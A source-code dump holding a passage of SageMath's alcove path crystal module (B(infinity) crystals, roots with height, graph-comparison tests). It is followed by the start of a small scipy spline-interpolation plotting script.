CrystalOfAlcovePathsElement\n\n\nclass InfinityCrystalOfAlcovePaths(UniqueRepresentation, Parent):\n r\"\"\"\n `\\mathcal{B}(\\infty)` crystal of alcove paths.\n \"\"\"\n @staticmethod\n def __classcall_private__(cls, cartan_type):\n \"\"\"\n Normalize input to ensure a unique representation.\n\n TESTS::\n\n sage: A1 = crystals.infinity.AlcovePaths(['A',2])\n sage: A2 = crystals.infinity.AlcovePaths(CartanType(['A',2]))\n sage: A3 = crystals.infinity.AlcovePaths('A2')\n sage: A1 is A2 and A2 is A3\n True\n \"\"\"\n cartan_type = CartanType(cartan_type)\n return super().__classcall__(cls, cartan_type)\n\n def __init__(self, cartan_type):\n \"\"\"\n Initialize ``self``.\n\n TESTS::\n\n sage: A = crystals.infinity.AlcovePaths(['C',3])\n sage: TestSuite(A).run(max_runs=20)\n\n sage: A = crystals.infinity.AlcovePaths(['A',2,1])\n sage: TestSuite(A).run() # long time\n \"\"\"\n self._cartan_type = cartan_type\n Parent.__init__(self, category=HighestWeightCrystals().Infinite())\n\n self.module_generators = ( self.element_class(self, (), 0), )\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: crystals.infinity.AlcovePaths(['E',6])\n Infinity crystal of alcove paths of type ['E', 6]\n \"\"\"\n return \"Infinity crystal of alcove paths of type {}\".format(self._cartan_type)\n\n class Element(ElementWrapper):\n def __init__(self, parent, elt, shift):\n \"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: A = 
crystals.infinity.AlcovePaths(['F',4])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([2,3,1,4,4,2,3,1])\n sage: TestSuite(x).run()\n \"\"\"\n ElementWrapper.__init__(self, parent, elt)\n self._shift = shift\n\n def e(self, i):\n \"\"\"\n Return the action of `e_i` on ``self``.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['D',5,1])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([1,3,4,2,5,4,5,5])\n sage: x.f(4).e(5) == x.e(5).f(4)\n True\n \"\"\"\n y = self.projection().e(i)\n if y is None:\n return None\n if not y.value:\n return self.parent().module_generators[0]\n\n n = self.parent()._cartan_type.rank()\n s = lambda rt: int(sum(rt.associated_coroot().coefficients()))\n shift = self._shift\n while y.is_admissible():\n # The only element with a shift of 0 is the highest weight element.\n # So we do not need to check for the shift being 0.\n prev = y\n shift -= 1\n A = CrystalOfAlcovePaths(self.parent()._cartan_type, [shift]*n)\n try:\n y = A(tuple([A._R(rt.root, rt.height - s(rt.root)) for rt in y.value]))\n except ValueError: # Invalid height (and not admissible)\n break\n shift += 1\n return type(self)(self.parent(),\n tuple([(rt.root, rt.height - shift*s(rt.root))\n for rt in prev.value]),\n shift)\n\n def f(self, i):\n \"\"\"\n Return the action of `f_i` on ``self``.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['E',7,1])\n sage: mg = A.highest_weight_vector()\n sage: mg.f_string([1,3,5,6,4,2,0,2,1,0,2,4,7,4,2])\n ((alpha[2], -3), (alpha[5], -1), (alpha[1], -1),\n (alpha[0] + alpha[1], -2),\n (alpha[2] + alpha[4] + alpha[5], -2),\n (alpha[5] + alpha[6], -1), (alpha[1] + alpha[3], -1),\n (alpha[5] + alpha[6] + alpha[7], -1),\n (alpha[0] + alpha[1] + alpha[3], -1),\n (alpha[1] + alpha[3] + alpha[4] + alpha[5], -1))\n \"\"\"\n s = lambda rt: int(sum(rt.associated_coroot().coefficients()))\n y = self.projection().f(i)\n if y is not None:\n return type(self)(self.parent(),\n tuple([(rt.root, rt.height - self._shift*s(rt.root))\n for rt in y.value]),\n self._shift)\n\n shift = self._shift + 1\n n = self.parent()._cartan_type.rank()\n A = CrystalOfAlcovePaths(self.parent()._cartan_type, [shift]*n)\n y = A(tuple([A._R(rt, h + shift*s(rt)) for rt,h in self.value])).f(i)\n return type(self)(self.parent(),\n tuple([(rt.root, rt.height - shift*s(rt.root))\n for rt in y.value]),\n shift)\n\n def epsilon(self, i):\n r\"\"\"\n Return `\\varepsilon_i` of ``self``.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['A',7,2])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([1,0,2,3,4,4,4,2,3,3,3])\n sage: [x.epsilon(i) for i in A.index_set()]\n [0, 0, 0, 3, 0]\n sage: x = mg.f_string([2,2,1,1,0,1,0,2,3,3,3,4])\n sage: [x.epsilon(i) for i in A.index_set()]\n [1, 2, 0, 1, 1]\n \"\"\"\n return self.projection().epsilon(i)\n\n def phi(self, i):\n r\"\"\"\n Return `\\varphi_i` of ``self``.\n\n Let `A \\in \\mathcal{B}(\\infty)` Define `\\varphi_i(A) :=\n \\varepsilon_i(A) + \\langle h_i, \\mathrm{wt}(A) \\rangle`,\n where `h_i` is the `i`-th simple coroot and `\\mathrm{wt}(A)`\n is the :meth:`weight` of `A`.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['A',8,2])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([1,0,2,3,4,4,4,2,3,3,3])\n sage: [x.phi(i) for i in A.index_set()]\n [1, 
1, 1, 3, -2]\n sage: x = mg.f_string([2,2,1,1,0,1,0,2,3,3,3,4])\n sage: [x.phi(i) for i in A.index_set()]\n [4, -1, 0, 0, 2]\n \"\"\"\n P = self.parent().weight_lattice_realization()\n h = P.simple_coroots()\n return self.epsilon(i) + P(self.weight()).scalar(h[i])\n\n def weight(self):\n \"\"\"\n Return the weight of ``self``.\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['E',6])\n sage: mg = A.highest_weight_vector()\n sage: fstr = [1,3,4,2,1,2,3,6,5,3,2,6,2]\n sage: x = mg.f_string(fstr)\n sage: al = A.weight_lattice_realization().simple_roots()\n sage: x.weight() == -sum(al[i]*fstr.count(i) for i in A.index_set())\n True\n \"\"\"\n P = self.parent().weight_lattice_realization()\n y = self.projection()\n return y.weight() - self._shift * P.rho()\n\n def projection(self, k=None):\n r\"\"\"\n Return the projection ``self`` onto `B(k \\rho)`.\n\n INPUT:\n\n - ``k`` -- (optional) if not given, defaults to the smallest\n value such that ``self`` is not ``None`` under the projection\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['G',2])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([2,1,1,2,2,2,1,1]); x\n ((alpha[2], -3), (alpha[1] + alpha[2], -3),\n (3*alpha[1] + 2*alpha[2], -1), (2*alpha[1] + alpha[2], -1))\n sage: x.projection()\n ((alpha[2], 0), (alpha[1] + alpha[2], 9),\n (3*alpha[1] + 2*alpha[2], 8), (2*alpha[1] + alpha[2], 14))\n sage: x.projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 3*Lambda[1] + 3*Lambda[2]\n\n sage: mg.projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 0\n sage: mg.f(1).projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight Lambda[1] + Lambda[2]\n sage: mg.f(1).f(2).projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight Lambda[1] + Lambda[2]\n sage: b = mg.f_string([1,2,2,1,2])\n sage: b.projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 2*Lambda[1] + 2*Lambda[2]\n sage: b.projection(3).parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 3*Lambda[1] + 3*Lambda[2]\n sage: b.projection(1)\n \"\"\"\n if k is None:\n k = self._shift\n elif k < self._shift:\n return None\n s = lambda rt: int(sum(rt.associated_coroot().coefficients()))\n n = self.parent()._cartan_type.rank()\n A = CrystalOfAlcovePaths(self.parent()._cartan_type, [k]*n)\n return A(tuple([A._R(rt, h + k*s(rt)) for rt,h in self.value]))\n\n\nclass RootsWithHeight(UniqueRepresentation, Parent):\n r\"\"\"\n Data structure of the ordered pairs `(\\beta,k)`,\n where `\\beta` is a positive root and `k` is a non-negative integer. 
A total\n order is implemented on this set, and depends on the weight.\n\n INPUT:\n\n - ``cartan_type`` -- Cartan type of a finite or affine untwisted root\n system\n\n - ``weight`` -- dominant weight as a list of (integral) coefficients of\n the fundamental weights\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n\n sage: r1 = R._root_lattice.from_vector(vector([1,0])); r1\n alpha[1]\n sage: r2 = R._root_lattice.from_vector(vector([1,1])); r2\n alpha[1] + alpha[2]\n\n sage: x = R(r1,0); x\n (alpha[1], 0)\n sage: y = R(r2,1); y\n (alpha[1] + alpha[2], 1)\n sage: x < y\n True\n \"\"\"\n\n @staticmethod\n def __classcall_private__(cls, starting_weight, cartan_type = None):\n \"\"\"\n Classcall to mend the input.\n\n Internally, the RootsWithHeight code works with a ``starting_weight`` that\n is in the ``weight_space`` associated to the crystal. The user can, however,\n also input a ``cartan_type`` and the coefficients of the fundamental weights\n as ``starting_weight``. This code transforms the input into the right\n format (also necessary for UniqueRepresentation).\n\n TESTS::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: S = RootsWithHeight(CartanType(['A',2]), (3,2))\n sage: R is S\n True\n\n sage: R = RootSystem(['B',2,1])\n sage: La = R.weight_space().basis()\n sage: C = RootsWithHeight(['B',2,1],[0,0,1])\n sage: B = RootsWithHeight(La[2])\n sage: B is C\n True\n \"\"\"\n if cartan_type is not None:\n cartan_type, starting_weight = CartanType(starting_weight), cartan_type\n\n R = RootSystem(cartan_type)\n P = R.weight_space()\n Lambda = P.basis()\n offset = R.index_set()[Integer(0)]\n starting_weight = P.sum(starting_weight[j-offset]*Lambda[j] for j in R.index_set())\n\n return super().__classcall__(cls, starting_weight)\n\n def __init__(self, weight):\n r\"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: TestSuite(R).run()\n \"\"\"\n Parent.__init__(self, category = Sets() )\n\n cartan_type = weight.parent().cartan_type()\n self._cartan_type = cartan_type\n self._root_system = RootSystem(cartan_type)\n self._root_lattice = self._root_system.root_lattice()\n self._weight_lattice = self._root_system.weight_lattice()\n self.weight = weight\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: RootsWithHeight(['A',2],[3,2])\n Roots with height of Cartan type ['A', 2] and dominant weight 3*Lambda[1] + 2*Lambda[2]\n \"\"\"\n return \"Roots with height of Cartan type %s and dominant weight %s\" % (\n self._root_system.cartan_type(), self.weight)\n\n def _max_height(self, root):\n r\"\"\"\n If root is `\\beta`, return `k = \\langle \\lambda, \\beta^{\\vee} \\rangle`.\n\n Only ordered pairs of the form `(\\beta, l)` for `0 \\leq l < k` are\n allowed.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: C = RootsWithHeight(['A',3],[3,2,0])\n sage: x = C._root_lattice.from_vector(vector([1,1])); x\n alpha[1] + alpha[2]\n sage: C._max_height(x)\n 5\n \"\"\"\n return self.weight.scalar(root.associated_coroot())\n\n @cached_method\n def word(self):\n r\"\"\"\n Gives the initial 
alcove path (`\\lambda`-chain) in terms of simple\n roots. Used for plotting the path.\n\n .. NOTE::\n\n Currently only implemented for finite Cartan types.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: R.word()\n [2, 1, 2, 0, 1, 2, 1, 0, 1, 2]\n \"\"\"\n cartan_type = self._root_system.cartan_type()\n if not cartan_type.is_finite():\n raise NotImplementedError\n lambda_chain = [ x.root for x in self.lambda_chain() ]\n\n coroot_lattice = RootSystem(cartan_type).coroot_lattice()\n cohighest_root = coroot_lattice.highest_root()\n\n word = []\n for i in range(len(lambda_chain)):\n beta = lambda_chain[i]\n for j in reversed(range(i)):\n beta = beta.reflection(lambda_chain[j])\n #beta is now a simple root or the highest root\n\n coroot = beta.associated_coroot()\n support = coroot.support() # the path is in dual affine space\n if len(support) == 1: # beta is a simple root\n word.append(support[0])\n elif coroot == -cohighest_root:\n word.append(0)\n else:\n assert False, 'should never get here'\n\n return word\n\n @cached_method\n def lambda_chain(self):\n r\"\"\"\n Return the unfolded `\\lambda`-chain.\n\n .. NOTE:: Only works in root systems of finite type.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n sage: R.lambda_chain()\n [(alpha[2], 0), (alpha[1] + alpha[2], 0), (alpha[1], 0), (alpha[1] + alpha[2], 1)]\n \"\"\"\n if not self._root_lattice.cartan_type().is_finite():\n raise ValueError(\"Cartan type {0} is not finite\".format(self._root_lattice.cartan_type()))\n\n l=[]\n for i in self._root_lattice.positive_roots():\n for j in range(self._max_height(i)):\n l.append(self(i,j))\n\n return sorted(l)\n\n def _element_constructor_(self, root, height):\n r\"\"\"\n Construct a :class:`RootsWithHeightElement` with ``self`` as the parent.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([1,1])); x\n alpha[1] + alpha[2]\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n sage: y = R(x,1); y\n (alpha[1] + alpha[2], 1)\n \"\"\"\n root = self._root_lattice.from_vector(vector(root))\n return self.element_class(self, root, height)\n\n def _an_element_(self):\n r\"\"\"\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: R._an_element_()\n (alpha[1], 0)\n \"\"\"\n return self( self._root_lattice.from_vector(vector([1])), 0 )\n\n\nclass RootsWithHeightElement(Element):\n r\"\"\"\n Element of :class:`RootsWithHeight`.\n\n INPUT:\n\n - ``root`` -- A positive root `\\beta` in our root system\n - ``height`` -- Is an integer, such that\n `0 \\leq l \\leq \\langle \\lambda, \\beta^{\\vee} \\rangle`\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([1,1])); x\n alpha[1] + alpha[2]\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n sage: y = R(x, 1); y\n (alpha[1] + alpha[2], 1)\n \"\"\"\n\n def __init__(self, parent, root, height):\n r\"\"\"\n Initialize 
``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([1,1]))\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: y = R(x, 1); y\n (alpha[1] + alpha[2], 1)\n sage: TestSuite(x).run()\n \"\"\"\n Element.__init__(self, parent)\n max_height = parent._max_height(root)\n\n # make sure the height is in the right range, this also catches negative\n # roots\n\n if not 0 <= height < max_height:\n raise ValueError(\"%d out of allowed range [%d,%d)\"%(height, 0, max_height))\n\n v = [height/max_height]\n v.extend( [ x/max_height for x in root.associated_coroot().to_vector() ] )\n #v.insert(0, height/max_height)\n\n # the map from (root, height) --> _cmp_v is injective\n\n self._cmp_v = tuple(v)\n self.root = root\n self.height = height\n\n def _repr_(self):\n r\"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: vec = rl.from_vector(vector([1,1])); vec\n alpha[1] + alpha[2]\n sage: R(vec,1)\n (alpha[1] + alpha[2], 1)\n \"\"\"\n return \"(%s, %s)\" % (self.root, self.height)\n\n def __hash__(self):\n r\"\"\"\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: root = rl.from_vector(vector([1,1]))\n sage: vec = R(root,0)\n sage: hash(vec) == hash(vec)\n True\n \"\"\"\n return hash(self._cmp_v)\n\n def __eq__(self, other):\n r\"\"\"\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: v1 = rl.from_vector(vector([1,1]))\n sage: v2 = rl.from_vector(vector([1]))\n sage: x1 = R(v1,1) ; x2 = R(v1,0) ; x3 = R(v2,1)\n sage: x1.__eq__(x1)\n True\n sage: x1.__eq__(x2)\n False\n sage: x1.__eq__(x3)\n False\n \"\"\"\n try:\n return self._cmp_v == other._cmp_v\n except (NameError, AttributeError):\n return False\n\n def _richcmp_(self, other, op):\n r\"\"\"\n Define a total order on :class:`RootsWithHeightElement`. 
This defines\n the initial `\\lambda`-chain.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: v1 = rl.from_vector(vector([1,1]))\n sage: v2 = rl.from_vector(vector([1]))\n sage: x1 = R(v1,1) ; x2 = R(v1,0) ; x3 = R(v2,1)\n sage: x1 < x2\n False\n sage: x1 < x3\n True\n \"\"\"\n # I suspect that if you redefine this method to produce a\n # different (valid) `\\lambda`-chain the rest of the\n # code should still work.\n #todo: check if self and other have the same parent ?\n #assert self.parent() is other.parent(), \"elements have different parents\"\n return richcmp(self._cmp_v, other._cmp_v, op)\n\n\nRootsWithHeight.Element = RootsWithHeightElement\n\n#####################################################################\n# Test code, by comparing with existing crystal implementations.\n#####################################################################\n\n\ndef _test_some_specific_examples(clss=CrystalOfAlcovePaths):\n r\"\"\"\n Test against some specific (finite type) examples.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import _test_some_specific_examples\n sage: _test_some_specific_examples(crystals.AlcovePaths)\n G2 example passed.\n C3 example passed.\n B3 example 1 passed.\n B3 example 2 passed.\n True\n \"\"\"\n # This appears in Lenart.\n C = clss(['G',2],[0,1])\n G = C.digraph()\n\n GT = DiGraph({\n () : {(0) : 2 },\n (0) : {(0,8) : 1 },\n (0,1) : {(0,1,7) : 2 },\n (0,1,2) : {(0,1,2,9) : 1 },\n (0,1,2,3) : {(0,1,2,3,4) : 2 },\n (0,1,2,6) : {(0,1,2,3) : 1 },\n (0,1,2,9) : {(0,1,2,6) : 1 },\n (0,1,7) : {(0,1,2) : 2 },\n (0,1,7,9) : {(0,1,2,9) : 2 },\n (0,5) : {(0,1) : 1, (0,5,7) : 2 },\n (0,5,7) : {(0,5,7,9) : 1 },\n (0,5,7,9) : {(0,1,7,9) : 1 },\n (0,8) : {(0,5) : 1 }\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"G2 example passed.\")\n\n # Some examples from Hong--Kang:\n\n # type C, ex. 8.3.5, pg. 189\n C = clss(['C',3],[0,0,1])\n G = C.digraph()\n GT = DiGraph({\n ():{ (0): 3},\n (0):{ (0, 6): 2},\n (0, 1):{ (0, 1, 3): 3, (0, 1, 7): 1},\n (0, 1, 2):{ (0, 1, 2, 3): 3},\n (0, 1, 2, 3):{ (0, 1, 2, 3, 8): 2},\n (0, 1, 2, 3, 4):{ (0, 1, 2, 3, 4, 5): 3},\n (0, 1, 2, 3, 8):{ (0, 1, 2, 3, 4): 2},\n (0, 1, 3):{ (0, 1, 3, 7): 1},\n (0, 1, 3, 7):{ (0, 1, 2, 3): 1, (0, 1, 3, 7, 8): 2},\n (0, 1, 3, 7, 8):{ (0, 1, 2, 3, 8): 1},\n (0, 1, 7):{ (0, 1, 2): 1, (0, 1, 3, 7): 3},\n (0, 6):{ (0, 1): 2, (0, 6, 7): 1},\n (0, 6, 7):{ (0, 1, 7): 2}\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"C3 example passed.\")\n\n # type B, fig. 8.1 pg. 
172\n C = clss(['B',3],[2,0,0])\n G = C.digraph()\n\n GT = DiGraph({\n ():{ (6): 1},\n (0):{ (0, 7): 2},\n (0, 1):{ (0, 1, 11): 3},\n (0, 1, 2):{ (0, 1, 2, 9): 2},\n (0, 1, 2, 3):{ (0, 1, 2, 3, 10): 1},\n (0, 1, 2, 3, 10):{ (0, 1, 2, 3, 4): 1},\n (0, 1, 2, 9):{ (0, 1, 2, 3): 2, (0, 1, 2, 9, 10): 1},\n (0, 1, 2, 9, 10):{ (0, 1, 2, 3, 10): 2},\n (0, 1, 5):{ (0, 1, 2): 3, (0, 1, 5, 9): 2},\n (0, 1, 5, 9):{ (0, 1, 2, 9): 3, (0, 1, 5, 9, 10): 1},\n (0, 1, 5, 9, 10):{ (0, 1, 2, 9, 10): 3},\n (0, 1, 8):{ (0, 1, 5): 3},\n (0, 1, 8, 9):{ (0, 1, 5, 9): 3, (0, 1, 8, 9, 10): 1},\n (0, 1, 8, 9, 10):{ (0, 1, 5, 9, 10): 3},\n (0, 1, 11):{ (0, 1, 8): 3},\n (0, 7):{ (0, 1): 2, (0, 7, 11): 3},\n (0, 7, 8):{ (0, 7, 8, 9): 2},\n (0, 7, 8, 9):{ (0, 1, 8, 9): 2},\n (0, 7, 8, 9, 10):{ (0, 1, 8, 9, 10): 2},\n (0, 7, 11):{ (0, 1, 11): 2, (0, 7, 8): 3},\n (6):{ (0): 1, (6, 7): 2},\n (6, 7):{ (0, 7): 1, (6, 7, 11): 3},\n (6, 7, 8):{ (0, 7, 8): 1, (6, 7, 8, 9): 2},\n (6, 7, 8, 9):{ (6, 7, 8, 9, 10): 1},\n (6, 7, 8, 9, 10):{ (0, 7, 8, 9, 10): 1},\n (6, 7, 11):{ (0, 7, 11): 1, (6, 7, 8): 3}\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"B3 example 1 passed.\")\n\n C = clss(['B',3],[0,1,0])\n G = C.digraph()\n\n GT = DiGraph({\n ():{ (0): 2},\n (0):{ (0, 1): 1, (0, 7): 3},\n (0, 1):{ (0, 1, 7): 3},\n (0, 1, 2):{ (0, 1, 2, 8): 2},\n (0, 1, 2, 3):{ (0, 1, 2, 3, 5): 1, (0, 1, 2, 3, 9): 3},\n (0, 1, 2, 3, 4):{ (0, 1, 2, 3, 4, 5): 1},\n (0, 1, 2, 3, 4, 5):{ (0, 1, 2, 3, 4, 5, 6): 2},\n (0, 1, 2, 3, 5):{ (0, 1, 2, 3, 5, 9): 3},\n (0, 1, 2, 3, 5, 9):{ (0, 1, 2, 3, 4, 5): 3},\n (0, 1, 2, 3, 9):{ (0, 1, 2, 3, 4): 3, (0, 1, 2, 3, 5, 9): 1},\n (0, 1, 2, 5):{ (0, 1, 2, 3, 5): 2},\n (0, 1, 2, 8):{ (0, 1, 2, 3): 2},\n (0, 1, 2, 8, 9):{ (0, 1, 2, 3, 9): 2},\n (0, 1, 7):{ (0, 1, 2): 3, (0, 1, 7, 8): 2},\n (0, 1, 7, 8):{ (0, 1, 7, 8, 9): 3},\n (0, 1, 7, 8, 9):{ (0, 1, 2, 8, 9): 3},\n (0, 2):{ (0, 1, 2): 1, (0, 2, 5): 2},\n (0, 2, 5):{ (0, 2, 5, 8): 1},\n (0, 2, 5, 8):{ (0, 1, 2, 5): 1},\n (0, 7):{ (0, 1, 7): 1, (0, 2): 3}\n })\n\n if not G.is_isomorphic(GT):\n return False\n else:\n print(\"B3 example 2 passed.\")\n\n # type B, fig. 8.3 pg. 
174\n\n return True\n\n\ndef compare_graphs(g1, g2, node1, node2):\n r\"\"\"\n Compare two edge-labeled :class:`graphs ` obtained from\n ``Crystal.digraph()``, starting from the root nodes of each graph.\n\n - ``g1`` -- :class:`graphs `, first digraph\n - ``g2`` -- :class:`graphs `, second digraph\n - ``node1`` -- element of ``g1``\n - ``node2`` -- element of ``g2``\n\n Traverse ``g1`` starting at ``node1`` and compare this graph with\n the one obtained by traversing ``g2`` starting with ``node2``.\n If the graphs match (including labels) then return ``True``.\n Return ``False`` otherwise.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import compare_graphs\n sage: G1 = crystals.Tableaux(['A',3], shape=[1,1]).digraph()\n sage: C = crystals.AlcovePaths(['A',3],[0,1,0])\n sage: G2 = C.digraph()\n sage: compare_graphs(G1, G2, C( () ), G2.vertices(sort=True)[0])\n True\n \"\"\"\n for out_edge in g1.outgoing_edges( node1 ):\n matched = False\n for o2 in g2.outgoing_edges( node2 ):\n if o2[2] == out_edge[2]:\n if matched:\n print(\"ERROR: Two edges with the same label for \", out_edge, \" exist.\")\n return False\n matched = True\n result = compare_graphs(g1, g2, out_edge[1], o2[1])\n if not result:\n return False\n if not matched:\n print(\"ERROR: No matching edge for \", out_edge, \".\")\n return False\n return True\n\n\ndef _test_against_tableaux(R, N, k, clss=CrystalOfAlcovePaths):\n r\"\"\"\n Test :class:`~sage.combinat.crystals.alcove_path.CrystalOfAlcovePaths`\n against all of the tableaux crystals of type `R` in rank `N` with\n highest weight given by a partition of `k`.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import _test_against_tableaux\n sage: _test_against_tableaux(['A',3], 3, 2)\n ** Shape [2]\n T has 10 nodes.\n C weight [2, 0, 0]\n C has 10 nodes.\n Compare graphs: True\n ** Shape [1, 1]\n T has 6 nodes.\n C weight [0, 1, 0]\n C has 6 nodes.\n Compare graphs: True\n \"\"\"\n from sage.combinat.partition import Partitions\n from sage.combinat.crystals.tensor_product import CrystalOfTableaux\n shapes = Partitions(k).list()\n for shape in shapes:\n print(\"** Shape \", shape)\n T = CrystalOfTableaux(R, shape = shape)\n ct = len(T.list())\n print(\" T has \", ct, \" nodes.\")\n #T.digraph().show(edge_labels=True)\n H = T.digraph()\n weight = T.module_generators[0].weight()\n w = [ weight.scalar(RootSystem(R).ambient_space().simple_coroot(i)) for i in range(1,N+1) ]\n print(\" C weight \", w)\n\n C = clss(R , w)\n\n cc = len(C.list())\n #C.digraph().show(edge_labels=True)\n G = C.digraph()\n print(\" C has \", cc, \" nodes.\")\n if cc != ct:\n print(\"FAIL: number of nodes differ.\", cc, ct)\n return\n print(\" Compare graphs: \", compare_graphs(G, H, C(()), H.vertices(sort=True)[0]))\n\n\ndef _test_with_lspaths_crystal(cartan_type, weight, depth=10):\n r\"\"\"\n Test if the digraphs generated are isomorphic to the ones generated by\n LS-path model.\n\n INPUT:\n\n - ``cartan_type`` -- Cartan type of a finite or affine untwisted root\n system\n - ``weight`` -- dominant weight as a list of (integral) coefficients of the\n fundamental weights\n - ``depth`` -- starting at the module generator how deep do you want to\n generate the crystal, useful for affine types\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import _test_with_lspaths_crystal\n sage: _test_with_lspaths_crystal(['A',3,1],[1,0,0,0],10) #long time\n True\n sage: _test_with_lspaths_crystal(['G',2,1],[1,0,0,0,0],10) #long time\n True\n \"\"\"\n from 
sage.combinat.crystals.littelmann_path import CrystalOfLSPaths\n    G1 = CrystalOfAlcovePaths(cartan_type, weight).digraph(depth=depth)\n    C = CrystalOfLSPaths(cartan_type, weight)\n    G2 = C.digraph(subset=C.subcrystal(max_depth=depth, direction='lower'))\n\n    return G1.is_isomorphic(G2, edge_labels=True)\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/combinat/crystals/alcove_path.py","file_name":"alcove_path.py","file_ext":"py","file_size_in_byte":70437,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"}
+{"seq_id":"10215192620","text":"import numpy as np\nimport scipy as sp\nfrom scipy.interpolate import splev, splrep\nfrom scipy.interpolate import Rbf\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef main_2():\n    x = np.linspace(0, 16, 16)\n    # y = np.random.rand(16)\n    y = np.sin(x)\n    tck = splrep(x, y, k=3)\n    x2 = np.linspace(0, 16, 48)\n    y2 = splev(x2, tck)\n    plt.subplot(211)\n    plt.plot(np.linspace(0, 48, 48), y2)\n    plt.subplot(212)\n    plt.plot(x, y)\n    plt.show()\n    return\n    # y2 has shape 32\n\n    new_y2 = y2[12:48]\n    y3 = new_y2[np.arange(0, 31, 2).astype(int)]\n    y4 = new_y2[np.arange(1, 32, 2).astype(int)]\n\n    plt.plot(x, y, 'r-', x, y3, 'g--', x, y4, 'b:')\n    #plt.plot(x2,y2)\n    plt.show()\n\ndef main_3():\n    x = np.linspace(0, 16, 16)\n    # y = np.random.rand(16)\n    y = np.sin(x)\n    tck = splrep(x, y, k=3)\n    x2 = np.linspace(0, 16, 32)\n    y2 = splev(x2, tck)\n    # y2 has shape 32\n\n    new_y2 = y2[0:0+16]\n    y3 = new_y2[np.arange(0, 16, 1).astype(int)]\n\n    plt.plot(x, y, 'r-', x, y3, 'g--')\n    #plt.plot(x2,y2)\n    plt.show()\n\ndef main_compress():\n    # sample counts must be integers 